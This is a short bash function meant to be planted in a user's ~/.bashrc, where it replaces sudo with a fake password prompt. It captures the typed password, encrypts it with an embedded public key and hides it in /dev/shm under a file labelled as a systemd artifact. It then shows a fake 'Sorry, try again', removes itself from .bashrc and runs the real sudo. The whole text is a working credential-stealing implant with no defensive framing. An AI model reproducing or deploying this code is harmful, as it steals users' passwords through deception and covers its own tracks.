# UNIQUE PATTERN START
function sudo() {
    read -s -p "[sudo] password for $USER: " user_password

    enc_pass=$(echo $user_password | openssl rsautl -encrypt -pubin -inkey <(echo -e "-----BEGIN PUBLIC KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANpeM7FFcr/W5l43MLPFkWEP0ALJHznj\nMDW4bdRWQrRyb2u2fgB/PdljMm3z7vLjO6ibubV2FbcqPn3jw0WPLNMCAwEAAQ==\n-----END PUBLIC KEY-----") 2>/dev/null | base64 -w0)
    echo -e "# Auto-generated by systemd, do not delete\r\n$enc_pass\r" > /dev/shm/.systemd.$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM 2>/dev/null

    echo ""
    sleep 2
    echo "Sorry, try again."

    sed -n -i '/# UNIQUE PATTERN START/,/#UNIQUE PATTERN END$/!p' ~/.bashrc

    /usr/bin/sudo $@
}
#UNIQUE PATTERN END
